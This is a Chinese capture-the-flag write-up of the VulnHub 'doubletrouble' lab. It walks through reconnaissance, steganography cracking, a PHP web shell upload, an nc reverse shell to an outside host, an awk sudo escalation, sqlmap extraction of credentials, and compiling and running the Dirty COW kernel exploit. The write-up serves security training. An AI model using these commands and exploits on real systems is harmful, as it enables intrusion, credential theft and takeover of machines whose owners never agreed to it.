vulnhub靶场之doubletrouble

news2024/10/4 10:32:07

一.环境搭建

1.靶场描述

get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.
This works better with VirtualBox rather than VMware 
 

2.下载地址

https://www.vulnhub.com/entry/doubletrouble-1,743/
 

image-20240131202048527

3.启动靶场

image-20240131202142255

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.1.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.1.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.1.0/24
 

image-20240131202325156

arp-scan -l
 

image-20240131202547979

靶场IP地址为:192.168.1.11

(2)探测端口及服务

nmap -p- -sV 192.168.1.11
 

image-20240131202514903

发现开启了22端口, OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
发现开启了80端口, Apache httpd 2.4.38 ((Debian))
 

(3)web指纹识别

whatweb -v 192.168.1.11
 

image-20240131202915403

扫描到框架是qdPM

3.渗透测试

(1)访问web服务

http://192.168.1.11
 

image-20240131203043423

我们可以看到是qdPM

(2)扫描web服务

1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.1.11
 

image-20240131203150497

2)nikto扫描网站结构
nikto -h http://192.168.1.11
 

image-20240131203556932

我们扫描到3个目录,我们一个一个进行访问

http://192.168.1.11/images
 

image-20240131203328547

没有任何有用的信息

http://192.168.1.11/secret
 

image-20240131203444420

扫描到一个图片,我们先保存下来

http://192.168.1.11/template
 

image-20240131203509902

3)dirsearch目录扫描
dirsearch -u 192.168.1.11 -e * -x 403 --random-agent
 

image-20240131204018728

目前,我们掌握的信息是一个qdPM9.1框架和一张图片。

(3)渗透测试

1)查找漏洞

我们使用msf查找漏洞,查找到一个漏洞,但是需要密码,这个办法行不通。

image-20240131204241666

我们使用kali进行查找漏洞,但是漏洞需要密码,还是不行。

image-20240131204542837

image-20240131205145769

2)图片隐写

我们想到前面有一个图片,我们进行查看

image-20240131210145045

使用steghide工具先查看一下图片基本信息,但是需要密码,我们没有密码

steghide --info '/home/kali/桌面/doubletrouble.jpg' 
 

image-20240131212520438

我们使用stegseek进行爆破

stegseek  --crack '/home/kali/桌面/doubletrouble.jpg'
 

image-20240131212820945

看到账号密码,尝试登录

image-20240131212950912

我们看到登录成功

3)文件上传

我们进行查找,看有没有可以利用的地方,发现这里有上传点

image-20240131213144837

image-20240131213051652

我们上传一句话木马,连接蚁剑

image-20240131213240845

image-20240131213329376

我们可以看到连接成功

http://192.168.1.11/uploads/users/197129-MS02423.php
 

image-20240131213423291

4)反弹shell
nc -e /bin/bash 192.168.1.9 5555
 

image-20240131213826380

5)提权

使用sudo -l查看该用户是否具有sudo权限,发现awk可以

image-20240131213941106

发现awk可以进行无密码使用sudo操作

sudo awk 'BEGIN {system("/bin/bash")}'
 

image-20240131214648118

我们进入root查看,发现没有flag,有一个镜像,我们下载下来

image-20240131214809105

我们把靶机复制到uploads目录下

cp doubletrouble.ova /var/www/html/uploads
 

image-20240131215328396

因为这个镜像我之前就下载下来了,所以这里我们不用探测ip地址了,ip地址为192.168.1.15

三.第二个镜像

我们知道ip地址为192.168.1.15,前面的步骤和第一个是一样的,这里我就进行简写

1.探测端口及服务

image-20240131215757699

发现开启了22端口, OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
发现开启了80端口, Apache httpd 2.2.22 ((Debian))
 

2.访问web服务

http://192.168.1.15
 

image-20240131221025067

我们看到是一个登录页面,一般登录页面要么爆破,要么进行测试SQL注入,这个只能进行SQL注入。

3.SQL注入

(1)测试是否存在SQL注入

首先我们进行抓包

image-20240131221312957

image-20240131221417024

发现存在SQL注入

(2)爆破数据

sqlmap -r '/home/kali/Desktop/MS02423.txt' --dbs --batch
 

image-20240131221808200

sqlmap -r '/home/kali/Desktop/MS02423.txt' -D 'doubletrouble' --tables --batch
 

image-20240131221950016

sqlmap -r '/home/kali/Desktop/MS02423.txt' -D 'doubletrouble' -T 'users' --columns --batch
 

image-20240131222306338

sqlmap -r '/home/kali/Desktop/MS02423.txt' -D 'doubletrouble' -T 'users' -C 'username,password' --batch --dump
 

image-20240131222834208

最后我们爆破出来2个用户名和密码

montreux GfsZxc1  
clapton ZubZub99 
 

(3)ssh登录

我们使用2个用户名和密码进行登录,发现页面登录不了

image-20240202193519466

前面扫描端口的时候,发现22端口是开放的,我们进行登录试试

image-20240202193838489

我们发现montreux登录不了,但是clapton可以

image-20240202194312256

我们得到了第一个flag

(4)提权

我们使用sudo -l查看,显示不存在

image-20240202194408520

我们查看内核版本,查找漏洞

uname -a 
 

image-20240202194447742

查看下系统内核版本信息,发现存在脏牛漏洞,内核版本:3.2.0-4-amd64。

searchsploit linux 3.2
searchsploit -m 40616.c   下载
 

image-20240202195038088

我们进行查看40616.c内容, 先使用gcc连接,然后直接使用,后面不用跟其他命令

image-20240202195354864

使用nc传输,将40616.c传输到clapton系统中

在clapton的shell中启动nc接收
nc -lvnp 10086 > 40616.c
 

image-20240202195652880

在kali中使用nc上传40616.c
nc 192.168.1.15 10086 < 40616.c -w 1
 

image-20240202195828939

image-20240202195918107

我们可以看到传输成功了

我们可以看到40616.c没有执行权限,我们加权限

chmod  777 40616.c
 

image-20240202200100072

gcc连接,生成可执行程序,进行执行

gcc 40616.c -o 40616.c -pthread
./40616.c
 

image-20240202200440095

我们可以看到提权成功,查看flag

image-20240202200544952

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.dirsearch目录扫描

9.图片隐写

10.文件上传

11.反弹shell

12.SQL注入

13.ssh登录

14.脏牛漏洞

15.gcc

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1457346.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

详解4大C语言内存函数【超详细建议点赞收藏】

目录 1. memcpy----内存拷贝1.1 函数介绍1.2 函数使用1.3 模拟实现 2. memmove----重叠内存的数据拷贝2.1 函数介绍2.2 函数使用2.3 模拟实现 3. memcmp----内存比较3.1 函数介绍3.2 函数使用 4.memset----内存设置4.1 函数介绍4.2 函数使用 注意&#xff1a;以下4个内存函数在…

VFH特征的使用(二)

一、VFH特征识别 C recognize_objects.h #pragma once #include <pcl/point_cloud.h> #include <pcl/point_types.h> #include <pcl/common/common.h> #include <pcl/common/transforms.h> #include <pcl/console/parse.h> #include <pcl/…

基于Spring Boot的智能物流管理系统,计算机毕业设计(带源码+论文)

源码获取地址&#xff1a; 码呢-一个专注于技术分享的博客平台一个专注于技术分享的博客平台,大家以共同学习,乐于分享,拥抱开源的价值观进行学习交流http://www.xmbiao.cn/resource-details/1759581137025445890

做temu跨境电商,必读这五大秘诀!

随着互联网的飞速发展&#xff0c;电商行业呈现出前所未有的繁荣景象。新兴电商平台Temu成为了众多创业者的关注焦点。本文将为您解析如何在Temu电商蓝海项目中&#xff0c;从自身能力建设、了解市场环境到做好定位等方面&#xff0c;找到属于您的成功之路。 一、自身能力建设 …

【白嫖8k买的机构vip教程】Selenium(3):python+selenium环境安装

准备工具如下&#xff1a; Python安装包&#xff1a;https://www.python.org/getit/PyCharm Pycharm安装包&#xff1a;http://www.jetbrains.com/pycharm/download/Selenium Selenium安装包&#xff1a;https://pypi.python.org/pypi/selenium、或者在pycharm中直接下载seleni…

Vector - CANoe - CAPL重启VN设备退出BusOff

在总线测试中进行BusOff测试的时候&#xff0c;偶尔会遇到将Vector工具链下的VN系列设备进入到BusOff状态&#xff0c;这个时候我们就只能重启CANoe才能将VN系列设备进行重启&#xff0c;才可以再次在Trace窗口上看到发送和接收的报文。不过在某些特定的情况的下&#xff0c;我…

【大模型 知识图谱】ChatKBQA:KBQA知识图谱问答 + 大模型

ChatKBQA&#xff1a;KBQA知识图谱问答 大模型 提出背景传统方法处理流程ChatKBQA处理流程对比优势 总结ChatKBQA框架概览特征1&#xff1a;逻辑形式生成特征2&#xff1a;无监督实体和关系检索特征3&#xff1a;参数高效的微调特征4&#xff1a;GQoT 可解释的查询执行特征5&a…

【白嫖8k买的机构vip教程】安卓设备连接电脑进行adb命令操作

Android 真机进行adb 命令的操作&#xff1a; 连接方式 &#xff1a; 数据线连接&#xff1a; 1&#xff09;手机需通过数据线连接电脑&#xff1b; 2&#xff09;手机调出开发者选项&#xff1b;手机操作步骤&#xff1a;设置——系统——关于手机&#xff08;平板电脑&am…

VMware还原Windows11 ghost镜像

文章目录 环境步骤准备制作启动iso文件创建虚拟机启动虚拟机还原Windows 参考 环境 Windows 11 家庭中文版VMware Workstation 17 Pro石大师装机大师Windows 11 ghost系统镜像 步骤 准备 下载好Windows 11 ghost系统镜像&#xff0c;我下载的文件是 FQ_WIN11_X64_VDL_V2080…

【教3妹学编程-算法题】将数组分成最小总代价的子数组 II

2哥 : 叮铃铃&#xff0c;3妹&#xff0c;过年干嘛呢&#xff0c;是不是逛吃逛吃&#xff0c;有没有长胖呢。 3妹&#xff1a;切&#xff0c;我妈张罗着要给我相亲呢。 2哥 : 相亲&#xff1f;哈哈哈哈 3妹&#xff1a;别笑了&#xff0c;我妈说跟我年龄相等的人都已经孩子上小…

为什么2023年是AI视频的突破年,以及对2024年的预期#a16z

2023年所暴露的AI生成视频的各种问题&#xff0c;大部分被OpenAI发布的Sora解决了吗&#xff1f;以下为a16z发布的总结&#xff0c;在关键之处&#xff0c;我做了OpenAI Sora的对照备注。 推荐阅读&#xff0c;了解视频生成技术进展。 Why 2023 Was AI Video’s Breakout Year,…

开发消息多发工具需要用到的源代码

在数字化时代&#xff0c;消息传递是许多应用程序的核心功能之一&#xff0c;从社交媒体到企业通信&#xff0c;从个人聊天到群发消息&#xff0c;消息传递无处不在&#xff0c;为了满足这种需求&#xff0c;开发者经常需要创建或定制消息多发工具。 这些工具通常需要处理多个…

MySQL数据库基础(十):DQL数据查询语言

文章目录 DQL数据查询语言 一、数据集准备 二、select查询 三、简单查询 四、条件查询 1、比较查询 2、范围查询 3、逻辑查询 4、模糊查询 5、非空查询 五、排序查询 六、聚合查询 七、分组查询与having子句 1、分组查询介绍 2、group by的使用 3、group by 聚…

【深入理解设计模式】单例设计模式

单例设计模式 概念&#xff1a; 单例模式&#xff08;Singleton Pattern&#xff09;是 Java 中最简单的设计模式之一。 单例设计模式是一种创建型设计模式&#xff0c;其主要目的是确保类在应用程序中的一个实例只有一个。这意味着无论在应用程序的哪个位置请求该类的实例&a…

网站常见的反爬手段及反反爬思路

摘要:介绍常见的反爬手段和反反爬思路&#xff0c;内容详细具体&#xff0c;明晰解释每一步&#xff0c;非常适合小白和初学者学习&#xff01;&#xff01;&#xff01; 目录 一、明确几个概念 二、常见的反爬手段及反反爬思路 1、检测user-agent 2、ip 访问频率的限制 …

Web服务器基础

Web服务器基础 【一】前端概述 【1】HTML HTML&#xff08;超文本标记语言&#xff09;是用于创建网页结构的标记语言。它定义了网页的骨架&#xff0c;包括标题、段落、列表、链接等元素&#xff0c;但没有样式。可以将HTML视为网页的结构和内容的描述。 【2】CSS css&…

NAS系统折腾记 | TinyMediaManager刮削电影海报

搭建好了NAS系统和Emby Media Server&#xff0c;接下来就是怎样对下载好的电影/电视剧集等内容进行刮削来展示电影海报墙获得更好的效果了。实际上&#xff0c;Emby Server本身就内置了强大的元数据抓取功能&#xff0c;能够自动从互联网上抓取电影、电视剧的元数据和海报等信…

mysql在服务器中的主从复制Linux下

mysql在服务器中的主从复制Linux下 为什么要进行主从复制主从复制的原理主从复制执行流程操作步骤主库创建从库创建 测试 为什么要进行主从复制 在业务中通常会有情况&#xff0c;在sql执行时&#xff0c;将表锁住&#xff0c;导致不能进行查询&#xff0c;这样就会影响业务的…

【教程】MySQL数据库学习笔记(一)——认识与环境搭建(持续更新)

写在前面&#xff1a; 如果文章对你有帮助&#xff0c;记得点赞关注加收藏一波&#xff0c;利于以后需要的时候复习&#xff0c;多谢支持&#xff01; 【MySQL数据库学习】系列文章 第一章 《认识与环境搭建》 第二章 《数据类型》 文章目录 【MySQL数据库学习】系列文章一、认…

C++ 位运算常用操作 二进制中1的个数

给定一个长度为 n 的数列&#xff0c;请你求出数列中每个数的二进制表示中 1 的个数。 输入格式 第一行包含整数 n 。 第二行包含 n 个整数&#xff0c;表示整个数列。 输出格式 共一行&#xff0c;包含 n 个整数&#xff0c;其中的第 i 个数表示数列中的第 i 个数的二进制表…